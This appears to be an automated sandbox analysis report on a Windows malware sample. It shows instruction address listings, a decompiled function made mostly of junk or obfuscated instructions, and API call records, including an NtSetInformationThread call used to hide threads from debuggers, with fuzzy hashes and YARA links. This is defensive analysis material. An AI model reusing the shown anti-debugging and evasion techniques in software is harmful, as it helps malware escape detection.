                          0x00000000
                          0x00401a62
                          0x00401a62
                          0x00401a66
                          0x00401a68
                          0x00401a69
                          0x00401a6c
                          0x00401a6e
                          0x00401a72
                          0x00401a74
                          0x00401a75
                          0x00401a77
                          0x00401a7d
                          0x00401a7d
                          0x00401a7e
                          0x00401a82
                          0x00401a84
                          0x00401a8a
                          0x00401a8c
                          0x00401a8e
                          0x00401a90
                          0x00401a92
                          0x00401a94
                          0x00401a96
                          0x00401a98
                          0x00401a9a
                          0x00401a9d
                          0x00401aa0
                          0x00401aa2
                          0x00401aa4
                          0x00401aa6
                          0x00401aa8
                          0x00401aaa
                          0x00401aac
                          0x00401aae
                          0x00401ab0
                          0x00401ab2
                          0x00401ab4
                          0x00401ab6
                          0x00401ab8
                          0x00401aba
                          0x00401abc
                          0x00401ac1
                          0x00401ac3
                          0x00401ac6
                          0x00401ac8
                          0x00000000
                          0x00401ac8
                          0x00401a6c
                          0x00401a60
                          0x00401ad9
                          0x00401adb
                          0x00401add
                          0x00401adf
                          0x00401ae1
                          0x00401ae3
                          0x00401ae5
                          0x00401ae7
                          0x00401ae9
                          0x00401aeb
                          0x00401aed
                          0x00401aef
                          0x00401af1
                          0x00401af3
                          0x00401af5
                          0x00401af7
                          0x00401af9
                          0x00401afb
                          0x00401afd
                          0x00401aff
                          0x00401b01
                          0x00401b03
                          0x00401b07
                          0x00401b09
                          0x00401b0b
                          0x00401b0e
                          0x00401b0f
                          0x00401b16
                          0x00401b18
                          0x00401b1a
                          0x00401b1b
                          0x00401b1d
                          0x00401b1f
                          0x00401b25
                          0x00401b27
                          0x00401b29
                          0x00401b2b
                          0x00401b2d
                          0x00401b2e
                          0x00401b2f
                          0x00401b32
                          0x00401b33
                          0x00401b35
                          0x00401b37
                          0x00401b39
                          0x00401b3c
                          0x00401b3e
                          0x00401b40
                          0x00401b42
                          0x00401b44
                          0x00401b46
                          0x00401b48
                          0x00401b4a
                          0x00401b4b
                          0x00401b4d
                          0x00401b4f
                          0x00401b56
                          0x00401b58
                          0x00401b5a
                          0x00401b5b
                          0x00401b5d
                          0x00401b5f
                          0x00401b66
                          0x00401b69
                          0x00401b6c
                          0x00401b6e
                          0x00401b70
                          0x00401b71
                          0x00401b74
                          0x00401b7d
                          0x00401b80
                          0x00401b81
                          0x00401b83
                          0x00401b85
                          0x00401b87
                          0x00401b89
                          0x00401b8a
                          0x00401b8c
                          0x00401b92
                          0x00401b93
                          0x00401b96
                          0x00401b97
                          0x00401b9a
                          0x00401b9c
                          0x00401b9e
                          0x00401ba1
                          0x00401ba3
                          0x00401ba5
                          0x00401ba7
                          0x00401ba9
                          0x00401bab
                          0x00401bb2
                          0x00401bb6
                          0x00401bb9
                          0x00401bbb
                          0x00401bbd
                          0x00401bbf
                          0x00401bc9
                          0x00401bce
                          0x00401bcf
                          0x00401bd1
                          0x00401bd4
                          0x00401bd6
                          0x00401bd8
                          0x00401bda
                          0x00401bdc
                          0x00401bde
                          0x00401be0
                          0x00401be2
                          0x00401be4
                          0x00401be6
                          0x00401be8
                          0x00401bea
                          0x00401bec
                          0x00401bee
                          0x00401bf0
                          0x00401bf2
                          0x00401bf4
                          0x00401bf6
                          0x00401bf8
                          0x00401bfa
                          0x00401bfc
                          0x00401bfe
                          0x00401c00
                          0x00401c02
                          0x00401c04
                          0x00401c06
                          0x00401c08
                          0x00401c0a
                          0x00401c0c
                          0x00401c0e
                          0x00401c10
                          0x00401c12
                          0x00401c14
                          0x00401c16
                          0x00401c18
                          0x00401c1a
                          0x00401c1c
                          0x00401c1e
                          0x00401c20
                          0x00401c22
                          0x00401c24
                          0x00401c26
                          0x00401c28
                          0x00401c2a
                          0x00401c2c
                          0x00401c2e
                          0x00401c30
                          0x00401c32
                          0x00401c34
                          0x00401c36
                          0x00401c38
                          0x00401c3a
                          0x00401c3c
                          0x00401c3e
                          0x00401c40
                          0x00401c42
                          0x00401c44
                          0x00401c46
                          0x00401c48
                          0x00401c4a
                          0x00401c4c
                          0x00401c4e
                          0x00401c50
                          0x00401c51
                          0x00401c53
                          0x00401c55
                          0x00401c56
                          0x00401c57
                          0x00401c59
                          0x00401c5b
                          0x00401c5e
                          0x00401c5f
                          0x00401c61

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: #100
                          • String ID: VB5!6&*
                          • API String ID: 1341478452-3593831657
                          • Opcode ID: 74c3a27c5e7b214c6470ef477d57e1d50757b982bfcb486dc031bf3b092b0913
                          • Instruction ID: 592f94a81c5e57ebd708ba545b2f23eeb9c7c156f30bca6655cae21d4670f76f
                          • Opcode Fuzzy Hash: 74c3a27c5e7b214c6470ef477d57e1d50757b982bfcb486dc031bf3b092b0913
                          • Instruction Fuzzy Hash: C442CD3244E3C19FC7138B748DA26A27FB4EE1331471D49DFC8C19A1B3D2286A5AD766
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00403858, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 656memoryCOMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 83%
                          			E00403858() {
				signed int _t19;
				void* _t21;
				void* _t22;
				signed int _t23;
				signed int _t24;
				signed int _t26;
				void* _t28;
				intOrPtr* _t29;
				void* _t36;
				signed int _t37;
				void* _t38;
				signed int _t39;
				signed int _t41;

				 *_t19 =  *_t19 ^ _t19;
				 *_t19 =  *_t19 + _t19;
				asm("cdq");
				asm("aaa");
				asm("bound ebx, [esi-0x45be77cf]");
				asm("xlatb");
				_t21 = _t36;
				_t37 = _t39;
				asm("lodsb");
				asm("salc");
				asm("popfd");
				asm("lodsd");
				_push(_t21);
				es =  *((intOrPtr*)(_t21 - 0x1e064eb6));
				_t22 = _t21;
				asm("stosb");
				 *((intOrPtr*)(_t22 - 0x2d)) =  *((intOrPtr*)(_t22 - 0x2d)) + _t22;
				_t23 = _t26 ^  *(_t29 - 0x48ee309a);
				_t28 = _t22;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t23;
				asm("adc eax, [ebx-0x7cf20000]");
				 *_t23 =  *_t23 + _t23;
				 *_t23 =  *_t23 + _t29;
				_t10 = _t37 + 0x66;
				 *_t10 =  *((intOrPtr*)(_t37 + 0x66)) + _t29;
				asm("o16 jb 0x6b");
				asm("popad");
				if ( *_t10 <= 0) goto L1;
				_t24 = _t23 | 0x45000801;
				asm("insd");
				if(_t24 >= 0) {
					L5:
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					 *_t24 =  *_t24 + _t24;
					_push(_t24);
					asm("packssdw mm7, mm7");
					asm("packuswb xmm2, xmm6");
					asm("packuswb mm2, mm5");
					asm("packuswb xmm1, xmm1");
					asm("punpckhdq xmm6, xmm3");
					asm("punpckhbw xmm3, xmm3");
					asm("packuswb xmm2, xmm0");
					asm("packsswb xmm2, xmm7");
					asm("punpckhbw mm4, mm6");
					asm("packuswb mm7, mm1");
				}
				_t41 =  *(_t38 + 0x61) * 0x1190065;
				 *0xa2a719c1 =  *0xa2a719c1 + _t24;
				_t13 = _t38 + 0x6c000082;
				 *_t13 =  *(_t38 + 0x6c000082) & _t37;
				if ( *_t13 == 0) goto L3;
				 *((intOrPtr*)(_t38 + 0x42000082)) =  *((intOrPtr*)(_t38 + 0x42000082)) + 0xa2a719c1;
				asm("scasd");
				asm("lodsd");
				if (_t41 - 1 <= 0) goto L4;
				 *_t24 =  *_t24 + _t24;
				 *_t24 =  *_t24 + _t24;
				 *[ss:eax] =  *[ss:eax] + _t24;
				 *_t24 =  *_t24 + _t29;
				 *_t24 =  *_t24 + _t24;
				_t24 = _t24 + _t24;
				 *_t24 =  *_t24 + _t24;
				 *0xa2a719c1 =  *0xa2a719c1 + _t28;
				 *_t24 =  *_t24 + _t24;
				 *_t29 =  *_t29 + _t24;
				 *_t24 =  *_t24 + _t28;
				 *_t24 =  *_t24 + _t24;
				 *_t24 =  *_t24 + _t24;
				 *((intOrPtr*)(_t24 + 0x82)) =  *((intOrPtr*)(_t24 + 0x82)) + _t24;
				 *_t24 =  *_t24 + _t24;
				 *_t24 =  *_t24 + _t24;
				 *_t24 =  *_t24 + _t24;
				 *_t24 =  *_t24 + _t24;
				 *_t24 =  *_t24 + _t24;
				 *_t24 =  *_t24 + _t24;
				 *_t24 =  *_t24 + _t24;
				 *_t24 =  *_t24 + _t24;
				 *_t24 =  *_t24 + _t24;
				 *_t24 =  *_t24 + _t24;
				 *_t24 =  *_t24 + _t24;
				 *_t24 =  *_t24 + _t24;
				 *_t24 =  *_t24 + _t24;
				 *_t24 =  *_t24 + _t24;
				 *_t24 =  *_t24 + _t24;
				 *_t24 =  *_t24 + _t24;
				 *_t24 =  *_t24 + _t24;
				 *_t24 =  *_t24 + _t24;
				 *_t24 =  *_t24 + _t24;
				goto L5;
			}
















                          0x0040385a
                          0x0040385c
                          0x0040385e
                          0x0040385f
                          0x00403860
                          0x00403866
                          0x00403868
                          0x00403868
                          0x00403869
                          0x0040386d
                          0x0040386f
                          0x00403870
                          0x00403871
                          0x00403872
                          0x00403886
                          0x00403888
                          0x00403889
                          0x0040388c
                          0x0040388c
                          0x0040388d
                          0x0040388f
                          0x00403891
                          0x00403893
                          0x00403895
                          0x00403897
                          0x00403899
                          0x0040389b
                          0x0040389d
                          0x0040389f
                          0x004038a1
                          0x004038a3
                          0x004038a5
                          0x004038a7
                          0x004038a9
                          0x004038ab
                          0x004038ad
                          0x004038af
                          0x004038b1
                          0x004038b7
                          0x004038b9
                          0x004038bb
                          0x004038bb
                          0x004038be
                          0x004038c2
                          0x004038c3
                          0x004038c5
                          0x004038ca
                          0x004038cb
                          0x00403931
                          0x00403931
                          0x00403933
                          0x00403935
                          0x00403937
                          0x00403939
                          0x0040393b
                          0x0040393d
                          0x0040393f
                          0x00403941
                          0x00403943
                          0x00403945
                          0x00403947
                          0x00403949
                          0x0040394b
                          0x0040394d
                          0x0040394f
                          0x00403951
                          0x00403953
                          0x00403955
                          0x00403957
                          0x00403959
                          0x0040395b
                          0x0040395d
                          0x0040395f
                          0x00403961
                          0x00403963
                          0x00403965
                          0x00403967
                          0x00403969
                          0x0040396b
                          0x0040396d
                          0x0040396f
                          0x00403971
                          0x00403973
                          0x00403975
                          0x00403977
                          0x00403979
                          0x0040397b
                          0x0040397d
                          0x0040397f
                          0x00403981
                          0x00403983
                          0x00403985
                          0x00403987
                          0x00403989
                          0x0040398b
                          0x0040398d
                          0x0040398f
                          0x00403991
                          0x00403993
                          0x00403995
                          0x00403997
                          0x00403999
                          0x0040399b
                          0x0040399d
                          0x0040399f
                          0x004039a1
                          0x004039a3
                          0x004039a5
                          0x004039a7
                          0x004039a9
                          0x004039ab
                          0x004039ad
                          0x004039af
                          0x004039b1
                          0x004039b3
                          0x004039b5
                          0x004039b7
                          0x004039b9
                          0x004039bb
                          0x004039bd
                          0x004039bf
                          0x004039c1
                          0x004039c3
                          0x004039c5
                          0x004039c7
                          0x004039c9
                          0x004039cb
                          0x004039cd
                          0x004039cf
                          0x004039d1
                          0x004039d3
                          0x004039d5
                          0x004039d7
                          0x004039d9
                          0x004039db
                          0x004039dd
                          0x004039df
                          0x004039e1
                          0x004039e3
                          0x004039e5
                          0x004039e7
                          0x004039e9
                          0x004039eb
                          0x004039ed
                          0x004039ef
                          0x004039f1
                          0x004039f3
                          0x004039f5
                          0x004039f7
                          0x004039f9
                          0x004039fb
                          0x004039ff
                          0x00403a2b
                          0x00403a54
                          0x00403a68
                          0x00403aa4
                          0x00403ac2
                          0x00403ae8
                          0x00403b0d
                          0x00403b44
                          0x00403b65
                          0x00403b6d
                          0x004038cd
                          0x004038d4
                          0x004038d7
                          0x004038d7
                          0x004038dd
                          0x004038df
                          0x004038e6
                          0x004038e7
                          0x004038e8
                          0x004038ea
                          0x004038ec
                          0x004038ee
                          0x004038f1
                          0x004038f3
                          0x004038f5
                          0x004038f7
                          0x004038f9
                          0x004038fb
                          0x004038fd
                          0x004038ff
                          0x00403901
                          0x00403903
                          0x00403905
                          0x0040390b
                          0x0040390d
                          0x0040390f
                          0x00403911
                          0x00403913
                          0x00403915
                          0x00403917
                          0x00403919
                          0x0040391b
                          0x0040391d
                          0x0040391f
                          0x00403921
                          0x00403923
                          0x00403925
                          0x00403927
                          0x00403929
                          0x0040392b
                          0x0040392d
                          0x0040392f
                          0x00000000

                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AllocVirtual
                          • String ID: E>
                          • API String ID: 4275171209-855000429
                          • Opcode ID: fc4662d94897bbd8d95064013dc74adebccc8bd2ef655760d3a9a967357b9423
                          • Instruction ID: 8e196667fc9cf8ea1f1595be977f2233d61e135b0e9b019b9f32fb53a38ceb6a
                          • Opcode Fuzzy Hash: fc4662d94897bbd8d95064013dc74adebccc8bd2ef655760d3a9a967357b9423
                          • Instruction Fuzzy Hash: FAF1D4D1A2E743C6E593657000C543159A4EEA735A6778BFB6723728C2A33E434B728F
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 021D47EF, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 101nativethreadCOMMON
                          Download Yara Rule
                          APIs
                          • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,021D0570,00000000,00000000,00000000,00000000), ref: 021D05F8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: InformationThread
                          • String ID: 1.!T
                          • API String ID: 4046476035-3147410236
                          • Opcode ID: d197fca17fc0180e67d21b6e592c0604f74eaffedbc1dc2732cf89e1772ce896
                          • Instruction ID: 310cc753e2357c20e28ed2197bcec5108b0c3b78728361ff37cf9922dbdc82c4
                          • Opcode Fuzzy Hash: d197fca17fc0180e67d21b6e592c0604f74eaffedbc1dc2732cf89e1772ce896
                          • Instruction Fuzzy Hash: A0317B743C0309EEFB147E388D617EB26929F497D4F904229EDA76B2C0E774C841C651
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 021D04B2, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 98nativethreadCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 021D481A: LoadLibraryA.KERNELBASE(?,082962C8,?,021D04E9,00000000,00000000,00000040,00000000,?), ref: 021D48E9
                          • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,021D0570,00000000,00000000,00000000,00000000), ref: 021D05F8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: InformationLibraryLoadThread
                          • String ID: 1.!T
                          • API String ID: 543350213-3147410236
                          • Opcode ID: 03aec2ffbe5e581895b6571daf0e6ec3fd688edb95b59fdd0e8480aa69ee8f65
                          • Instruction ID: c84e28dafd62fa94c4459ecebbc044c3affcd4bcc1ccb66f574078319e673f1a
                          • Opcode Fuzzy Hash: 03aec2ffbe5e581895b6571daf0e6ec3fd688edb95b59fdd0e8480aa69ee8f65
                          • Instruction Fuzzy Hash: B83199783C0319EEFB147E388D61BEB26929F497C4F504229EDA6AB2C0E774CC01C651
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 021D04CD, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 97nativethreadCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 021D481A: LoadLibraryA.KERNELBASE(?,082962C8,?,021D04E9,00000000,00000000,00000040,00000000,?), ref: 021D48E9
                          • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,021D0570,00000000,00000000,00000000,00000000), ref: 021D05F8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: InformationLibraryLoadThread
                          • String ID: 1.!T
                          • API String ID: 543350213-3147410236
                          • Opcode ID: 5410f9e8353f6808882fe80bba05084f64ab9930763612efe02085c409cfcd2f
                          • Instruction ID: 28ea7e2b68f33d3f437f1fba649472ac440f6cd03a8c443646ada4a704815383
                          • Opcode Fuzzy Hash: 5410f9e8353f6808882fe80bba05084f64ab9930763612efe02085c409cfcd2f
                          • Instruction Fuzzy Hash: A0319C383C0319EEFB147E388D617EB26969F497C4F904229EDA6AB2C0E774CC01C651
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 021D078C, Relevance: 3.6, APIs: 2, Instructions: 591COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 021D481A: LoadLibraryA.KERNELBASE(?,082962C8,?,021D04E9,00000000,00000000,00000040,00000000,?), ref: 021D48E9
                          • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,?,00000539,?,?,?,-00000002,?,?,00140000,00000000,?), ref: 021D29B5
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: LibraryLoadProcessTerminate
                          • String ID:
                          • API String ID: 3349790660-0
                          • Opcode ID: c672aa40a8413f3ff397fe6fca062ec27c13daa26c55625c4d799e9e08b19e20
                          • Instruction ID: b2de606f4997910d06a3a3582c7c96e5d080ff25dcb27282a4b8a2032bd55f1a
                          • Opcode Fuzzy Hash: c672aa40a8413f3ff397fe6fca062ec27c13daa26c55625c4d799e9e08b19e20
                          • Instruction Fuzzy Hash: EF0278707C0305FEEF346E64CC94BEE2663EF45350F954129ED9A97185C77998C6CA02
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 021D0537, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 87nativethreadCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 021D481A: LoadLibraryA.KERNELBASE(?,082962C8,?,021D04E9,00000000,00000000,00000040,00000000,?), ref: 021D48E9
                          • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,021D0570,00000000,00000000,00000000,00000000), ref: 021D05F8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: InformationLibraryLoadThread
                          • String ID: 1.!T
                          • API String ID: 543350213-3147410236
                          • Opcode ID: 8ceb285f3d875a0eee6ecbe0854fc9ed2e6294d8f7718fe7067693a0749cc1eb
                          • Instruction ID: e2a7a4f997f1239df75067423e683ce4a64de7364e77448d2929ec6a1f9ca0b9
                          • Opcode Fuzzy Hash: 8ceb285f3d875a0eee6ecbe0854fc9ed2e6294d8f7718fe7067693a0749cc1eb
                          • Instruction Fuzzy Hash: BD216A383C4359EEFB246E388E71BD727969F45BD4F900229ED966B2C0D760DC41CA91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 021D0516, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 84nativethreadCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 021D481A: LoadLibraryA.KERNELBASE(?,082962C8,?,021D04E9,00000000,00000000,00000040,00000000,?), ref: 021D48E9
                          • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,021D0570,00000000,00000000,00000000,00000000), ref: 021D05F8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: InformationLibraryLoadThread
                          • String ID: 1.!T
                          • API String ID: 543350213-3147410236
                          • Opcode ID: eb2d2b0faa92adf65643db54b5c8bc31df9528c1fea867c12eec3e43d2b49427
                          • Instruction ID: 954ee39455f7fc8eae630146341c0d6e2a9473b2a11259117ee11c6304a44ad1
                          • Opcode Fuzzy Hash: eb2d2b0faa92adf65643db54b5c8bc31df9528c1fea867c12eec3e43d2b49427
                          • Instruction Fuzzy Hash: A6216B783C4359EAFB146E388D61BE722568F097D4F900225FDA76B1C0E764DC41C591
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 021D05D9, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 75nativethreadCOMMON
                          Download Yara Rule
                          APIs
                          • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,021D0570,00000000,00000000,00000000,00000000), ref: 021D05F8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: InformationThread
                          • String ID: 1.!T
                          • API String ID: 4046476035-3147410236
                          • Opcode ID: 6a2ee03b46db307b5a37b1d3fe185f7671c280c203ee62c2d50521e14eca7b9e
                          • Instruction ID: 968b1cc8f16a16352fa9ddd0abed7a27ec9abb6beb4ffab599776872e377af7a
                          • Opcode Fuzzy Hash: 6a2ee03b46db307b5a37b1d3fe185f7671c280c203ee62c2d50521e14eca7b9e
                          • Instruction Fuzzy Hash: C4216A78285359EBFB156E388DB07D737959F067A4F854229ECA29B2C0D724C841CAA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 021D059D, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66nativethreadCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 021D481A: LoadLibraryA.KERNELBASE(?,082962C8,?,021D04E9,00000000,00000000,00000040,00000000,?), ref: 021D48E9
                          • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,021D0570,00000000,00000000,00000000,00000000), ref: 021D05F8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: InformationLibraryLoadThread
                          • String ID: 1.!T
                          • API String ID: 543350213-3147410236
                          • Opcode ID: ee4061a47e12fe1cb0a2dacac262a7e618d3b7ff24a38530bca62724974c2d90
                          • Instruction ID: c2a0c0f616dc0a858316f7453b1dce675c2f4fc734fa904a5dfd800e72dafe86
                          • Opcode Fuzzy Hash: ee4061a47e12fe1cb0a2dacac262a7e618d3b7ff24a38530bca62724974c2d90
                          • Instruction Fuzzy Hash: 53119B78385359DBFB24AE388DA07DA3795AF497D4F540229EC62AB2C0D730DC00CAA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 021D3746, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13libraryCOMMON
                          Download Yara Rule
                          APIs
                          • LdrInitializeThunk.NTDLL(021D157A,?,00000000,?,00000017,0000035D,?,021D39E3,?), ref: 021D3769
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: InitializeThunk
                          • String ID: ninet.dll
                          • API String ID: 2994545307-2962335871
                          • Opcode ID: 280fd7bbd10375d7e3ce0ac6f0dd591bccf003e8305d759f6d703278185d5a54
                          • Instruction ID: c72cb3c9ea6629a0b8401b15260956907693e979f10c6a498aa68b7937f0b40c
                          • Opcode Fuzzy Hash: 280fd7bbd10375d7e3ce0ac6f0dd591bccf003e8305d759f6d703278185d5a54
                          • Instruction Fuzzy Hash: BAD022751802428EC120F728854AB8A3BA0DB40291B28C08888908B632CF30A627FBC2
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00403AEE, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 471memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AllocVirtual
                          • String ID: E>
                          • API String ID: 4275171209-855000429
